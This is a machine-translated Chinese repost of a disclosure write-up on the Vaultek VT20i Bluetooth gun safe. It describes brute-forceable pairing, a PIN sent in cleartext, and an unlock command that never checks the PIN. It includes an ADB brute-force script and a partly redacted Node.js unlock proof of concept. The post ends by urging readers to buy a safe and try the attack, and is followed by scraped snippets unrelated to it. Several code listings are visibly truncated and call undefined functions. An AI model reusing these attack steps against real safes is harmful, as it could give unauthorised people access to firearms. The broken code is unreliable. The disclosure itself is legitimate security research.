G-6318
G-6318

吃一堑长一智|逆向工程之反编译

 来自:https://www.twosixlabs.com/bluesteal-popping-gatt-safes/

远程攻击支持蓝牙的枪支保险箱

在这篇博文中,我们将详细介绍BlueSteal,或者在Vaultek VT20i中利用多个安全失败的能力。这些漏洞突出表明需要在产品制造过程早期包含安全审计。这些漏洞包括CVE-2017-17435和CVE-2017-17436。VT20i是一款非常受欢迎的产品,专为枪支的安全储存而设计,也是亚马逊的几个畅销产品之一。我们欣赏保险箱的形式和适合性,因为它是我们与之互动的保险箱之一。我们证明了可以通过传输特殊格式的蓝牙消息来解锁我们拥有的Vaultek VT20i枪支保险箱。

漏洞

  • 有趣的漏洞 - 制造商的Android应用程序允许与安全无限的配对尝试。配对PIN码与解锁PIN码相同。这允许攻击者通过反复强力配对尝试安全地识别共享pin码。
  • 真正有趣的漏洞 - CVE-2017-17436 - Android手机应用程序和保险箱之间没有加密。成功配对后,应用程序以明文形式传输保险箱的PIN码。该网站和营销材料宣称,这个通信通道是用“最高级蓝牙加密”和“数据传输通过AES256位加密安全”加密的。但是这些说法是不正确的。蓝牙LE标准不支持AES256位加密,我们还没有看到它在高层使用的证据。蓝牙LE支持AES-128,但制造商也没有使用。这种加密的缺乏使得个人通过窃听应用程序和保险箱之间的通信来学习密码。
  • “这是怎么发生的?” 漏洞 - CVE-2017-17435  - 即使不知道PIN码,攻击者也可以通过特殊格式的蓝牙消息远程解锁此产品系列中的任何安全设备。电话应用程序需要使用有效的引脚来操作保险箱,并且有一个字段在授权请求中提供引脚代码。然而,保险箱不验证PIN码,因此攻击者可以使用任意值作为PIN码来获得授权并解锁保险箱。

我们将深入挖掘所有这些漏洞的细节,以及我们如何在下面找到它们。

打破在容易的方式

第一步是获取Android APK与保险柜进行交互。这个APK可以在这里找到:https: //apkpure.com/vaultek/com.youhone.vaultek我们使用的版本是v2.0.1。APK的作者似乎是一个名叫Youhone的中国公司打开应用程序后,最初有一个连接到保险柜的视图,并使用PIN码进行配对。

吃一堑长一智|逆向工程之反编译_第1张图片

只是碰巧,这是用来解锁保险箱的相同PIN码。成功配对后,我们可以使用应用程序执行诸如解锁保险箱之类的命令。

吃一堑长一智|逆向工程之反编译_第2张图片

我们立即检查是否可以成功进行暴力攻击。引脚长度只有4-8位数字,数值1-5可用。由于这个相对较小的密钥空间,我们可以很容易地编写一个利用ADB操纵制造商应用程序的强力攻击。在攻击者最好的情况下,一个4个字符的PIN码,搜索空间是一个合理的5 4。这需要大约72分钟,每次保守7秒。

下面我们有一个快速和肮脏的Python脚本,它是通过ADB和输入顺序组合键与手机进行交互的。当脚本迭代到正确的密码和开门指令时,保险箱将弹出。

import os
import itertools
import time
for combination in itertools.product(xrange(1,6),repeat=4):
  print ''.join(map(str,combination))
  os.system("adb shell input touchscreen tap 600 600")
  time.sleep(5)
  os.system("adb shell input text"+ ' "' + ''.join(map(str,combination)) + '"')
  time.sleep(1)
  os.system("adb shell input touchscreen tap 500 1100")
  time.sleep(1)
  os.system("adb shell input touchscreen tap 850 770")

如果应用程序或安全机制针对不正确的重试超时,或者强制执行最大重试限制,则可能会阻止或减轻此漏洞。

我们很想笑,但是我们想要访问这个安全而不依靠暴力。

逆向工程

Vaultek APK负责配对和解锁保险柜。有两种方法来理解其功能:

  • 通过识别负责生成解锁命令的APK中的代码进行静态分析。
  • 通过数据包捕获传输命令和记录输出进行动态分析。

用于在安全和应用程序之间进行通信的协议是Bluetooth Low Energy,这是一些额外阅读的链接。

https://devzone.nordicsemi.com/tutorials/17/

数据包捕获

 

吃一堑长一智|逆向工程之反编译_第3张图片

我们最初使用Ubertooth来嗅探手机和保险箱之间的流量,将捕获记录到磁盘。

https://github.com/greatscottgadgets/ubertooth

在检查数据包捕获之后,显然没有使用AES 256加密。写命令正在以明文形式进行。

吃一堑长一智|逆向工程之反编译_第4张图片

既然是这样的话,那么使用内置于蓝牙HCI日志中的Android就简单多了。这里是一个关于如何利用这个功能的好文章。

这里是一个Android捕获链接,展示了对话。

在数据包捕获中,我们可以清楚地看到蓝牙低功耗GATT对话开始的位置。 看来,APK向0xB句柄发出单个写入请求这是为了启用通知。然后再与0xA处理进行冗长的交换

现在,让我们回到APK,看看这些数据有效载荷代表什么。

APK代码分析

在并行路径上,我们使用apktooldex2jar从APK中提取类文件。Luyten是Procyon反编译器的GUI,用于检查反编译的代码。

一个看起来特别有趣的类是OrderUtilsVT20。除此之外这个类包含命令有效载荷的格式化代码。还有与各种类型的命令有关的“魔术”常量。

    static {
        OrderUtilsVT20.PASSWORD = "12345678";
        OrderUtilsVT20.AUTHOR = new byte[] { 0, 0, 0, 0 };
        OrderUtilsVT20.CMD_AUTHOR = new byte[] { -128, -83 };
        OrderUtilsVT20.CMD_INFO = new byte[] { 48, -51 };
        OrderUtilsVT20.CMD_FINGER = new byte[] { 49, -51 };
        OrderUtilsVT20.CMD_LOG = new byte[] { 50, -51 };
        OrderUtilsVT20.CMD_DOOR = new byte[] { 51, -51 };
        OrderUtilsVT20.CMD_SOUND = new byte[] { 52, -51 };
        OrderUtilsVT20.CMD_LUMINANCE = new byte[] { 53, -51 };
        OrderUtilsVT20.CMD_DELETE = new byte[] { 54, -51 };
        OrderUtilsVT20.CMD_DELETE_ALL = new byte[] { 55, -51 };
        OrderUtilsVT20.CMD_TIME = new byte[] { 56, -51 };
        OrderUtilsVT20.CMD_DISCONNECT = new byte[] { 57, -51 };
        OrderUtilsVT20.CMD_ERROR = new byte[] { 59, -51 };
        OrderUtilsVT20.CMD_PAIR = new byte[] { 58, -51 };
        OrderUtilsVT20.CMD_PAIRED = new byte[] { 58, -51 };
    }

不幸的是,这些值不会直接显示在数据包捕获中。经过更多的调查,我们发现这是因为应用程序和安全性正在执行奇数编码例程来打包和变形有效载荷数据。APK还会将编码的有效负载分解为20个字节的长度块。这与在数据包捕获中观察到的格式相匹配。

编码功能如下:

if (!StringUtil.isVT20(s)) {}
        s = (String)(Object)new byte[array.length * 2 + 2];
        s[0] = true;
        s[s.length - 1] = -1;
        for (int i = 0; i < array.length; ++i) {
            final byte b = array[i];
            final byte b2 = array[i];
            s[i * 2 + 1] = (byte)(((b & 0xF0) >> 4) + 97);
            s[i * 2 + 2] = (byte)((b2 & 0xF) + 97);
        }
        Label_0220: {
            if (this.mGattCharacteristic != null && this.mBluetoothGatt != null) {
                int length = s.length;
                int n = 0;
                while (true) {
                    Label_0185: {
                        if (length > 20) {
                            break Label_0185;
                        }
                        array = new byte[length];
                        System.arraycopy(s, n * 20, array, 0, length);
                        int i = 0;
                    Label_0173_Outer:
                        while (true) {
                            this.SendData(array);
                            ++n;
                            while (true) {
                                try {
                                    Thread.sleep(10L);
                                    length = i;
                                    if (i == 0) {
                                        this.processNextSend();
                                        return;
                                    }
                                    break;
                                    array = new byte[20];
                                    System.arraycopy(s, n * 20, array, 0, 20);
                                    i = length - 20;
                                    continue Label_0173_Outer;

发现这个之后,翻转编码过程相对简单,我们的解码功能如下。

function decodePayload(payload){
	var res = new Array();
	for(var i=1;i


将这个解码函数应用到捕获的有效载荷后,就很容易识别应用程序传送到保险箱的命令。这是我们观察到的对话。

吃一堑长一智|逆向工程之反编译_第5张图片

这个对话中最有趣的两个命令是  getAuthor和  openDoor

这是负责格式化getAuthor命令的代码  

   public static byte[] getAuthor(final String password) {
        if (password == null || password.length() <= 0) {
            return null;
        }
        System.out.println("获取授权码  " + password);
        setPASSWORD(password);
        (OrderUtilsPro.data = new byte[24])[0] = -46;
        OrderUtilsPro.data[1] = -61;
        OrderUtilsPro.data[2] = -76;
        OrderUtilsPro.data[3] = -91;
        setTime();
        OrderUtilsPro.data[8] = OrderUtilsPro.CMD_AUTHOR[0];
        OrderUtilsPro.data[9] = OrderUtilsPro.CMD_AUTHOR[1];
        setRandom();
        setDateLength(4);
        CRC();
        setPassWord();
        return OrderUtilsPro.data;
    }
我们可以看到有一个 setPassWord 的调用,它将填充的pin码放在 getAuthor 的末尾 

    public static void setPASSWORD(final String s) {
        String password = s;
        Label_0062: {
            switch (s.length()) {
                default: {}
                case 4: {
                    password = "0000" + s;
                    break Label_0062;
                }
                case 7: {
                    password = "0" + s;
                    break Label_0062;
                }
                case 6: {
                    password = "00" + s;
                    break Label_0062;
                }
                case 5: {
                    password = "000" + s;
                }
                case 8: {
                    OrderUtilsPro.PASSWORD = password;
                }
            }
        }
    }
    
    public static void setPassWord() {
        for (int i = 0; i < 8; i += 2) {
            OrderUtilsPro.data[23 - i / 2] = (byte)(int)Integer.valueOf(OrderUtilsPro.PASSWORD.substring(i, i + 2), 16);
        }
    }


getAuthor命令的结构如下所示:

这是很麻烦的,因为APK在解锁过程中没有加密地传输编程的PIN码。这揭示了我们的第二个漏洞,以明文方式传输PIN码。

它也打我们,  getAuthor是短期的  getAuthorization深入研究这个信息,我们得到了上表中所示的结构。值得注意的是,结构末尾的PIN码实际上是在getAuthor命令中以明文形式传输的。这就把我们带到了最后的漏洞,安全不检查在getAuthor包中传输的PIN码,并且不管在现场是什么,都会用适当的授权令牌来回复。

安全对getAuthor命令的响应包含位于前4个字节的授权代码或令牌。我们花了一些时间才弄清楚这个返回消息是openDoor消息的必要组件因此,我们所需要做的就是获得openDoor命令的授权码,以便解锁保险箱。

我们可以看 com.youhone.vaultek.utils.ReceiveStatusVT20.ReceiveStatusVT20

switch (this.param) {
            default: {}
            case 41001: {
                System.out.println("获取授权码VT");
                this.author[0] = array[0];
                this.author[1] = array[1];
                this.author[2] = array[2];
                this.author[3] = array[3];
            }


在使用认证码填写前4个字节后,  openDoor命令具有以下格式。 吃一堑长一智|逆向工程之反编译_第6张图片

最后,打开保险柜的最低限度必要的谈话只是:

吃一堑长一智|逆向工程之反编译_第7张图片

概念验证(编辑)

这里是一个用于打开保险箱的概念代码编辑证明。下面的脚本本身不能在没有任何工作的情况下打开保险箱。

/*
Usage:
npm install noble
npm install split-buffer
node unlock.js
*/
var noble = require('noble');
var split = require('split-buffer');
var rawData = ["ThisIsWhere","TheRAWDataWouldGo"]
function d2h(d) {
    var h = (+d).toString(16);
    return h.length === 1 ? '0' + h : h;
}
 
function decodePayload(payload){
    var res = new Array();
    for(var i=1;i>4)+97;
        tmpC = (payload[i]&0xF)+97;
        res.push(tmpB);
        res.push(tmpC);
    }
    res.push(0xff);
    return res;
}
 
function CRC(target){
    var tmp = 0;
    for(var i=0;i<16;i=i+1){
        tmp += target[i] & 0xFF
    }
    var carray = new Array();
    carray.push(tmp&0xFF);
    carray.push((tmp&0xFF00)>>8);
    carray.push((tmp&0xFF0000)>>16);
    carray.push((tmp&0xFF000000)>>24);
    target[16] = carray.shift();
    target[17] = carray.shift();
    target[18] = carray.shift();
    target[19] = carray.shift();
}
 
function scan(state){
    if (state === 'poweredOn') {    // if the radio's on, scan for this service
        noble.startScanning();
        console.log("[+] Started scanning");
    } else {                        // if the radio's off, let the user know:
        noble.stopScanning();
        console.log("[+] Is Bluetooth on?");
    }
}
 
var mcount = 0;
function findMe (peripheral) {
    console.log('Discovered ' + peripheral.advertisement.localName);
    if (String(peripheral.advertisement.localName).includes("VAULTEK")){
      console.log('[+] Found '+peripheral.advertisement.localName)
    }
    else{
      return;
    }
    noble.stopScanning();
    peripheral.connect(function(error) {
        console.log('[+] Connected to peripheral: ' + peripheral.uuid);
        peripheral.discoverServices(['0e2d8b6d8b5e91d5b3706f0a1bc57ab3'],function(error, services) {
            targetService = services[0];
            targetService.discoverCharacteristics(['ffe1'], function(error, characteristics) {
                // got our characteristic
                targetCharacteristic = characteristics[0];
                targetCharacteristic.subscribe(function(error){});
                targetCharacteristic.discoverDescriptors(function(error, descriptors){
                    // write 0x01 to the descriptor
                    console.log('[+] Writing 0x01 to descriptor');
                    var descB = new Buffer('01','hex');
                    descriptor = descriptors[0];
                    descriptor.writeValue(descB,function(error){});
                    console.log('[+] Fetching authorization code');
                    message = split(Buffer.from(rawData.shift(),'hex'),20);
                    for(j in message){
                        targetCharacteristic.write(message[j],true,function(error) {});
                    }
                });
                targetCharacteristic.on('data', function(data, isNotification){
                    if(mcount==1)
                    {
                        process.exit()
                    }
                    mcount = mcount + 1;
                    data = decodePayload(data);
                    message = new Buffer.from(rawData.shift(),'hex');
                    message = decodePayload(message);
                    message[0] = data[0];
                    message[1] = data[1];
                    message[2] = data[2];
                    message[3] = data[3];
                    console.log("[+] Obtained Auth Code:");
                    console.log(d2h(data[0])+' '+d2h(data[1])+' '+d2h(data[2])+' '+d2h(data[3]));
                    CRC(message);
                    message = encodePayload(message)
                    message = new Buffer(message);
                    message = split(message,20);
                    console.log("[+] Unlocking Safe");
 
                    for(j in message){
                        targetCharacteristic.write(message[j],true,function(error) {});
                    }
                    return;
                });
            });
        });
    });
    return;
}
noble.on('stateChange', scan);  // when the BT radio turns on, start scanning
noble.on('discover', findMe);


这个脚本执行的步骤是:

  • getAuthor和  openDoor定义两个模板有效载荷  
  • 扫描保险箱,找到我们想要通过UUID进行交互的服务和特性。
  • 写一个0x01值到客户特性配置描述符为了启用通知。
  • 将我们的getAuthor编码模板有效载荷作为写入命令发送到20个字节的块中。然后等待处理值通知并检索响应。
  • 解码响应,并将前4个字节作为授权令牌。我们将这些授权字节放到我们的openDoor命令模板中。
  • 传送  openDoor命令后,应该打开保险箱。

后来我们学习了getAuthor命令中的唯一字段,  即硬编码的魔术字节和CRC值。

这意味着 具有pincode值的  getAuthor命令可以返回可以打开保险箱的授权码。

更好的是,  openDoor  命令只检查授权码,魔术值和CRC。


总结一下

我们已经在多个Vaultek VT20i保险箱上测试和验证了这个功能。非常好的学习范本,大家可以到亚马逊买一台回家试试。

你可能感兴趣的:(吃一堑长一智|逆向工程之反编译)

  • 《昼颜》里的日本女人:相遇要万种风情,分手要残忍绝情 迷影咖啡
    作者:迷之菌子神奇菇迷影咖啡:一本正经做烘焙,胡说八道聊电影漫天萤火虫消散之时良宵就将过去,人们也说含苞待放的花蕾总会开了又谢,因紧紧相拥而面红耳赤的躯体,便是我们经历过这热爱的证明。夫妻关系介绍《昼颜》是2014年电视剧《昼颜:工作日下午三点的恋人们》的续集,故事发在电视剧情节结束的三年后,讲述了已经恢复独身的纱和偶然与曾经的出轨对象北野重逢后再次陷入感情漩涡的故事。《昼颜》制作灵感源自利佳子在
  • 迎接2019 唯有杜康1994
    告别2018这一年是机遇与挑战,痛苦与喜悦,失去与收获的一年一月:收获了第一份爱情,开始真正想去了解一个人三月:对工作有了更深入的认识,靠自己的力量完成晋升五月:搬家,住进了自己理想的公寓,一间属于自己的屋子。满地的书六月:外调广州,升经理,有了自己的第一个团队。七月:怀着自我否定,第一次完成了部门任务八月:第一个员工流失,痛哭不已明白无不散之筵席九月:员工陆续离开,经济是一切的根本。十月:陪员工
  • 亲子日记之祝姑姥姥生日快乐(282) 冰心雨露_d504
    2021年7月18日,周日,晴周日上班的不上班,上学的不上学,全家都属于休息状态,洗衣做饭是上午的主要任务,中午休息一会儿,下午比较晚了出去给梦怡买了二年级上册的口算题卡,然后去参加姑姑的生日聚餐,本来姑姑应该是周一生日,因为周一都要上班,就提前到周日过了,说是过生日其实就是想借此机会一家人聚聚,毕竟平常都忙,没有时间聚在一起,梦怡还给姑姥姥做了生日贺卡,虽然长相一般,重在心意。生日快乐
  • android 自定义曲线图,Android自定义View——贝赛尔曲线 weixin_39767513 android自定义曲线图
    个人博客:haichenyi.com。感谢关注本文针对有一定自定义View的童鞋,最好对贝赛尔曲线有辣么一丢丢了解,不了解也没关系。花5分钟看一下GcsSloop的安卓自定义View进阶-Path之贝塞尔曲线。本文的最终效果图:最终效果图.gif思路首先他是一个只有上半部分的正弦形状的水波纹,很规则。其次,他这个正弦图左右在移动。然后,就是它这个自定义View,上下也在移动,是慢慢增加的最后,优化
  • 信任 饮冰伊乔
    随着社会的发展,微信和支付宝交易给人们带来了极大的方便,越来越多的人出门都只选择拿一部手机即可,方便安全,可昨天我就遇到了一件比较尴尬的事。昨天傍晚,我从公司出来,感觉有点饿,决定索性吃了饭再回去,来到去过几次的一个店里,如往常一样叫了餐,当时店里吃饭的不多,老板麻利的先去做了,正要扫微信付账的时候发现手机没电了,迷之尴尬,我只好跟老板说不用做了,手机没电了,我身上又没现金,付不了帐了。老板娘很热
  • Django之Debug篇 菜鸟之编程 Djangodjangopython后端
    一、DebugToolBar基本使用1.1、概述Django框架的调试工具栏使用django-debug-toolbar库,是一组可配置的面板,显示有关当前请求/响应的各种调试信息,点击时,显示有关面板内容的更多详细信息。官方文档:DjangoDebugToolbar—DjangoDebugToolbar4.3.0documentation1.2、安装pipinstalldjango-debug-
  • 以高质量调查研究助力组织工作提质增效 木同木同
    近日,中共中央办公厅印发了《关于在全党大兴调查研究的工作方案》(后简称《方案》),要求各地区各部门结合实际认真贯彻落实。调查研究是我们党的传家宝,是谋事之基、成事之道。组织部门作为党管干部的核心部门,肩负着管党员、管干部、管人才的重要职责,调查研究更是把握组织工作规律、破解组织工作难题的重要办法。要用好调查研究这一法宝,把准政治方向,贯穿问题导向,坚持实事求是,以高质量调查研究助力组织工作提质增效
  • 地低为海人低为王 缘梦草
    地低为海,人低为王。低,高之基,高,低之顶。谦虚才能收益,咄咄逼人会招损。高粱熟了,头会低下。受益反而会深藏不露。捧人之术,把人捧高,然后控制。受控之人,大都是虚荣心作祟。活成别人想象中的样子,像别人想象中那么有面子的活着是悲哀的。穷不可怕,怕的是虚荣心。当你好面子,你就会被控制。一旦受虚荣心控制,你不得不谨小慎微的维护面子,付出多余的能量,希望得到别人的一句赞。面子就是金子打造的牢笼,让你在赞美
  • 计划比盲目做重要 一祉微笑
    坚持分享第99天。一次次会议提醒着老师们假期余额不足,马上面临停机状态。50多天掐指而过,想想放假时的计划,对照如今的完成情况,感觉差太远。想着好好看书,如今50多天过去了第6本还处在未完待续状态;想着假期好好陪陪孩子,在玩中学一些知识,如今想想,孩子学的真不多;想着暑假坚持跑步,有时还是容易给自己找借口,休息三两天。给这个假期一个综合评价,只能说只完成了计划的百分之五六十。想想为什么临近开学没达
  • 081天 约柜失而复得 宁宁2018
    撒迦利亚书4:6他对我说:“这是耶和华指示所罗巴伯的。万军之耶和华说:‘不是倚靠势力,不是倚靠才能,乃是倚靠我的灵方能成事。’
  • 《金文成〈正蒙〉日记124。2020-11-9》 金吾生
    《金文成〈正蒙〉日记124。2020-11-9》今天是庚子丁亥丙子,九月廿四,2020年11月9日星期一。作者篇7【舜之孝,汤、武之武,虽顺逆不同,其为不幸均矣。】船山讲解说,顺,指的是舜的父亲最终受到感化,转变了态度,结局圆满之事;逆,指的是"桀放、纣诛",即,商汤放桀,周武诛纣,都是采用暴力,不是感化方式,所以是逆。顺与逆,都是为了解决弊政,然其差异之大如此,然而,无论圆满还是遗憾,其实他们都
  • 如何把大象装进冰箱的思考 210624 大丁_初心生活
    央视春晚曾有个小品,宋丹丹问赵本山,如何把大象装进冰箱。赵本山说不知道。宋丹丹得意地说,第一步,把冰箱门打开。第二步,把大象装进去。第三步,把冰箱门关上。我相信很多人看了都是一笑了之,我们也从潜意识上给出了否定的答案。樊登老师给出了不一样的解读,他认为这其实是解决问题的经典方法。“把大象装冰箱”,目标十分明确,宋丹丹给出的执行步骤也十分清晰。可赵本山却不会?难道赵本山不知道这三个步骤吗?肯定知道。
  • 道德经第三十四章 套马地汉纸
    道德经第三十四章原文:大道泛兮,其可左右!万物恃之而生,而不辞,功成不名有。爱养万物而不为主,常无欲,可名于小;万物归焉而不为主,可名为大。是以圣人终不为大,故能成其大。译文:大道广泛流行,无所不到。万物依赖它生长而不推辞,有所成就而不自以为有功。养育万物而不自以为主,永远没有私欲,可以说是渺小得很,所以可称它为“小”;物归附于它而它不自以为主宰,可以说极其伟大,所以可称它为“大”。由于它不自以为
  • Linux学习系列之vim编辑器(一) llibertyll linux学习
    vi编辑器的操作模式输入模式—aio等—>命令模式<—:键—末行模式从输入/末行模式切换到命令模式都是需要按ESC键注:a光标后输入,i光标前输入,o直接向下加一行输入,O向上加一行输入在vi编辑器中光标的移动(命令行模式下)键组合(命令)光标的移动$光标移动到当前行的结尾0(零)光标移动到当前行的开始GG光标移动到最后一行gg光标移动到第一行在命令行模式下删除与复制的操作键组合(命令)含义dd删
  • 6/21 最后的编织之观后感 ChereAlicia
    今天看了7分钟震撼人心之短篇有种当局者迷旁观者清的感觉在外人眼里看来已经足够但自有人深陷其中无法自拔而那个人很有可能是自己超脱物质寻求自己真正想要的方能得到内心的平息和安宁图片发自App
  • 每天学点成语 余子烨
    1、口诀:功败垂成未成功,不以为然不赞同;火中取栗被利用,罚不当罪处罚重;2、解释:功败垂成:事情接近成功的时候却遭到了失败。出自:《三国志·杨阜传》:“弃垂成之功,陷不义之名,阜以死守之。”不以为然:不认为是对的。表示不同意或否定。出自:宋·苏轼《再乞罢详定役法状》:“右臣先曾奏论前衙一役,只当招募,不当定差,执政不以为然。”火中取栗:一只猴子和一只猫看见炉火中烤着栗子,猴子叫猫去偷,猫用爪子从
  • 2023-11-07 碎碎念念的每一天
    忽然开始自卑了,感觉自己无论各个方面都太平平,读书不多,家务做不好,体重控制的不好,早起也困难,起来又不知道该做什么,没有一个可以为之奋斗的目标,也没有很好的交际圈,感觉自己就像一只在笼子里的鸟,想飞也飞不高……我想改变这样的现状,可该如何呢?其实都是我不够努力,没有争分夺秒,没有自律,这些都是我未来跟人拉开差距的原因,所以,我不应该只是自卑,自卑过头会变成焦虑,我应该努力去改变,哪怕改变一小点,
  • stm32之GPIO寄存器 luofengmacheng 嵌入式stm32嵌入式硬件单片机
    文章目录1背景2GPIO寄存器的类型2.1端口配置寄存器2.2设置/清除寄存器和位清除寄存器3总结1背景C51单片机在进行数据的输入输出时,是直接操作与外部引脚关联的内部寄存器,例如,当设置P2_1为0时,就是将外部引脚的P21引脚设置为低电平,当读取P2_1时,就是读取P21的电平。与之类似,stm32芯片内部也有很多用于输入输出的寄存器,这些寄存器也是用于操作外部引脚,但是比C51单片机复杂很
  • 《老子》笔记19 2018-10-28 海上明月共
    第二十二章[原文]曲则全,枉则直,洼则盈,敝则新,少则得,多则惑。是以圣人抱一为天下式。不自见,故明;不自是,故彰,不自伐,故有功;不自矜,故长。夫唯不争,故天下莫能与之争。古之所谓"曲则全"者,岂虚言哉?诚全而归之。[译文]委曲便会保全,屈枉便会直伸;低洼便会充盈,陈旧便会更新;少取便会获得,贪多便会迷惑。所以有道的人坚守这一原则作为天下事理的范式,不自我表扬,反能显明;不自以为是,反能是非彰明
  • 爱心账户之存钱日记11.20 静_d595
    新沙发终于到了,满心欢喜,可旧沙发的处理又是个头疼的问题,免费送都没有人要。临时想起来公司那个收垃圾的,看看付费能不能拉走。对方说随便给点都行,我又拿不准,于是就想说88把。对方说给两包烟就行了,我说还是给钱吧,也不想欠人情。如果请专门搬东西的估计得200加了,还算是比较顺利,刚好想到他。选了12元存进我的爱心账户!
  • 大话设计模式之工厂模式 码农客栈 设计模式开发语言
    工厂模式(FactoryPattern)是一种创建型设计模式,它提供了一种创建对象的最佳方式,而无需指定将要创建的对象的确切类。通过使用工厂模式,我们可以将对象的创建和使用分离,从而使代码更具灵活性和可维护性。在工厂模式中,通常会有三种角色:工厂接口(FactoryInterface):声明了一个用于创建对象的接口,这样所有具体工厂类都必须实现该接口。具体工厂(ConcreteFactory):实
  • 大话设计模式之代理模式 码农客栈 设计模式代理模式
    代理模式(ProxyPattern)是一种结构型设计模式,它允许通过代理对象控制对另一个对象的访问。代理对象充当客户端和实际对象之间的中介,客户端通过代理对象间接访问实际对象,从而可以在访问控制、缓存、延迟加载等方面提供额外的功能。在代理模式中,通常会有三种角色:Subject(抽象主题):声明了真实对象和代理对象的共同接口,这样在任何使用真实对象的地方都可以使用代理对象。RealSubject(
  • 【1.1 编程基础之输入输出】09. 字符菱形 青少年编程小助手_Python Openjudge题目解析算法青少年编程电子学会等级考试gesp
    09:字符菱形总时间限制:1000ms内存限制:65536kB描述给定一个字符,用它构造一个对角线长5个字符,倾斜放置的菱形。输入输入只有一行,包含一个字符。输出该字符构成的菱形。样例输入*样例输出*************参考程序(1)C语言#includeintmain(){charc;scanf("%c",&c);printf("%c\n",c);printf("%c%c%c\n",c,c,
  • 剩28天19年12月3日星期二 晴朗 岁月流转足迹可循
    图片发自App图片发自App图片发自App图片发自App昨天升完旗,去操场上走走,才发现霜是如此之重,脚踩上去,都有凝粒!天是越来越冷了!不过晴空净爽,空气清冽,一呼一吸之间很是舒服!中午写了几个大字,童爸说笔画还有些软,一语中的。需用心提升,贵在坚持坚持吧!下午做了张丽华的顺车,捎我到陈仓元,再坐了3路到西关,费时50分钟!晚上吃完饭送童去学校,到八点半下楼运动半小时,跳了500个绳,弯弯腰!感
  • 很久以前的故事 138 余间上古
    偶遇机械人大公子镇静下来继续说:“你可知所谓的拍卖会是要杀掉一些人,某些人斗不过一个映山城,天下虽大,从此后恐无容身之地。”他语气一缓:“如果你肯联手,我不但不计较你今日之举,杀手阁随时恭候大驾光临,从此多了一个方便之门。”“我只是寻找路彦而已......”薛莹笑道直呼其名:“剑二,用尽心思糊弄别人,独行者经常内斗再正常不过!你不过是一个道修,踏入神明之境而已,理解不到独行者的真谛……”薛莹言尽意
  • 因你 秋之枫520
    空气中,咖啡味弥散那是,一种我爱的香醇与你分别后,我的咖啡再没加过冰糖粉与牛奶品着苦涩,如同我生命的味道你若来了,倒给你半杯加糖加奶,空气多了两份香甜若你走了,我又会是一满杯一切如初,黑夜依旧宁静只有醇香陪着,久久不散因你,咖啡才会有苦有甜因你,我的小诗才有了主角因你,黑夜冲了杯喝不尽的咖啡因你,黑夜有了写不完的零碎小诗因你,我爱上了黑夜的这份宁静秋之枫。(原作)
  • 湘容儿成长日记第744天之只要不放弃,终究会遇见 墨mo晴
    2020年10月30号亲子共读地點:床边亲子共读时间:晚上亲子共读时长:35分钟亲子共读内容:芭比姐妹与小马、芭比之完美圣诞、三字经045-047今天收获还是很大,因为我解决了一个一直没有解决的问题。那就是我的手机内存。我的手机是64G的,界面上看到的软件又没有太多的东西被我删了,又删手机里面的图片,竟然没有50张。可就是经常的提醒我内存不足,内存不足。我和同事一起探讨过,我和我先生说过,可是终究
  • 零基础机器学习(5)之线性回归模型的性能评估 一只特立独行猪 机器学习机器学习线性回归人工智能
    文章目录线性回归模型的性能评估1.举例1-单一特征2.举例2-多特征线性回归模型的性能评估评估线性回归模型时,首先要建立评估的测试数据集(测试集不能与训练集相同),然后选择合适的评估方法,实现对线性回归模型的评估。回归任务中最常用的评估方法有均方误差、均方根误差和预测准确率(确定系数)。1.举例1-单一特征分别对两个模型进行评估,输入的测试集如表所示。面积/(m2)售价/(万元)面积/(m2)售价
  • 【设计模式】Java 设计模式之桥接模式(Bridge) 新手村长 Java设计模式设计模式java桥接模式
    桥接模式(BridgePattern)是结构型设计模式的一种,它主要解决的是抽象部分与实现部分的解耦问题,使得两者可以独立变化。这种类型的设计模式属于结构型模式,因为该模式涉及如何组合接口和它们的实现。将抽象部分与实现部分分离,使它们都可以独立地变化。一、桥接模式概述桥接模式的主要思想是将抽象与实现进行解耦,使得二者可以独立进行变化。在桥接模式中,抽象部分和实现部分被分离出来,抽象部分定义了一个抽
  • Ⅴ爱阅读,亲子互动——打卡第197天 郭小郭0830
    今天读《神奇数字123》,小熊很忙系列《小小宇航员》,《妈妈看从1到10》上午要去取快递和换面粉,不管怎么闹,一说坐车立马高兴!于是乎~上车走之~车开出去还没五分钟,没动静呢?一看早睡着了……脑袋里想到一个词“集贩子庙旋子”,大意就是爱凑热闹的很!下午妈妈和姥爷收拾院子,傍晚有点犯困的时候闹点气,不过小姨抱着一会儿就睡着了。等醒的时候,这个哭啊,哼哼唧唧了一个小时,抱了一个小时,其中抱着的时候尿湿
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
